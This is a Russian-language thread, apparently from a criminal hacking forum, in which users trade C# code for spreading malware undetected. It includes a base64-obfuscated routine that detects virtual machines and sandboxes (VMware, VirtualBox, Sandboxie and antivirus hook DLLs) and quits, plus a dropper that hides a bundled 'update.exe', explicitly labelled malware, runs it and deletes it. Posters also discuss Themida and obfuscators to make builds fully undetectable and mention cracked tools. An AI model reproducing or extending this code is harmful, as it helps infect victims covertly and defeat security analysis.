нужно прописать запуск в мейне. детекта?Допка .
В мейн подрубаем так: Atrub();
Скрытое содержимое
Уже "Модули под тему поперли" а точнее заметки для себя делаю ;D мб пригодится кому.
Как подключить не буду объяснять:
VMdetect.cs
Что такое то же думайте уже сами. Да там шифрование строк в base64 из момей соседней статьи, те кто следит за моими темами смогут разобраться.
Детект простой, но нулевой детект. Некоторый код заимствован. т.е данный код детекта вм не весь мой.C#:using System; using System.Linq; using System.Management; using System.Runtime.InteropServices; using System.Text; namespace ViSt { class VMdetect { public static void Runvmdetect() { if (DetectVirtualMachine()) Quit(); } [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string running); public static string CreateASCIIStr(string value) => Encoding.ASCII.GetString(Convert.FromBase64String(value)); public static bool DetectVirtualMachine() { using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) { using (var items = searcher.Get()) { foreach (var item in items) { string manufacturer = item["Manufacturer"].ToString().ToLower(); if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || manufacturer.Contains(CreateASCIIStr("dm13YXJl")) || item["Model"].ToString() == CreateASCIIStr("VmlydHVhbEJveA==") || GetModuleHandle("cmdvrt32.dll").ToInt32() != 0 || GetModuleHandle("SxIn.dll").ToInt32() != 0 || GetModuleHandle("SbieDll.dll").ToInt32() != 0 || GetModuleHandle("Sf2.dll").ToInt32() != 0 || GetModuleHandle("snxhk.dll").ToInt32() != 0) { return true; } var hypervisorPresentProperty = item.Properties .OfType<PropertyData>() .FirstOrDefault(p => p.Name == "HypervisorPresent"); if ((bool?)hypervisorPresentProperty?.Value == true) { return true; } } } } return false; } public static void Quit() { Environment.Exit(0); } } }
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Статья Получаем тематические загрузки вашего exe без слива на ВТ вашей малвари
- Автор темы ViCode
- Дата начала
нужно прописать запуск в мейне. детекта?
Вложения
- Автор темы
- Добавить закладку
- #202
В мейне подключи
VMdetect();
А ниже мейна вставь:
VMdetect();
А ниже мейна вставь:
C#:
class VMdetect
{
public static void Runvmdetect()
{
if (DetectVirtualMachine())
Quit();
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string running);
public static string CreateASCIIStr(string value) =>
Encoding.ASCII.GetString(Convert.FromBase64String(value));
public static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains(CreateASCIIStr("dm13YXJl"))
|| item["Model"].ToString() == CreateASCIIStr("VmlydHVhbEJveA==") || GetModuleHandle("cmdvrt32.dll").ToInt32() != 0 || GetModuleHandle("SxIn.dll").ToInt32() != 0
|| GetModuleHandle("SbieDll.dll").ToInt32() != 0 || GetModuleHandle("Sf2.dll").ToInt32() != 0 ||
GetModuleHandle("snxhk.dll").ToInt32() != 0)
{
return true;
}
var hypervisorPresentProperty
= item.Properties
.OfType<PropertyData>()
.FirstOrDefault(p => p.Name == "HypervisorPresent");
if ((bool?)hypervisorPresentProperty?.Value == true)
{
return true;
}
}
}
}
return false;
}
public static void Quit()
{
Environment.Exit(0);
}
}
а другая тема где про склейку, не подходит?
- Автор темы
- Добавить закладку
- #204
Можно в 1 архив добавить 2 софта и создать еще 1 поток ниже уже на второй софт:
C#:
new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари
// 2 строки далее можно удалить или оставить смотря как вам нужно
proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
File.Delete(dir + "\\update.exe"); //Удаляем exe малвари (если требуется)
}
catch (Exception)
{
}
}).Start();
new Thread(() =>
{
try
{
File.SetAttributes(dir + "\\update2.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\update2.exe"); //Запускаем exe малвари
// 2 строки далее можно удалить или оставить смотря как вам нужно
proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
File.Delete(dir + "\\update2.exe"); //Удаляем exe малвари (если требуется)
}
catch (Exception)
{
}
}).Start();Софты реверснули и слили билды. Подскажите что вписать, или что гуглить?
Хочу чтобы если реверснули, то пасс от зипа не нашли, а если и нашли, то не разобрали.
Первым что приходит в голову - сменить base64 на md5, но по скольку я 0 в шарпе - не имею возможности это реализовать.
Подскажите
Хочу чтобы если реверснули, то пасс от зипа не нашли, а если и нашли, то не разобрали.
Первым что приходит в голову - сменить base64 на md5, но по скольку я 0 в шарпе - не имею возможности это реализовать.
Подскажите
1-2 его сливают на вт и начинает подниматься обнаружение
используй обфускатор + защиту temidaСофты реверснули и слили билды. Подскажите что вписать, или что гуглить?
Хочу чтобы если реверснули, то пасс от зипа не нашли, а если и нашли, то не разобрали.
Первым что приходит в голову - сменить base64 на md5, но по скольку я 0 в шарпе - не имею возможности это реализовать.
Подскажите
темида еще больше даст детектов
С помощью темиды можно сделать фуд статик, не надо тут
Ну делись тогда, раз можно.
Чем делись? Так сложно несколько чекбоксов тыкнуть?
Поверять, я в темиде просидел сутки и перетестировал множество виртуалок. Фуда там не добиться. А если знаешь как это сделать - то лучше за место пустого трёпа рассказал бы и показал.
Позже найду какой-нить кряк темиды и выложу конфиг
На этом борде от Vicode есть кряк темиды. А так - буду ждать.
Посоветуйте какой обфускатор использовать в паре с темидой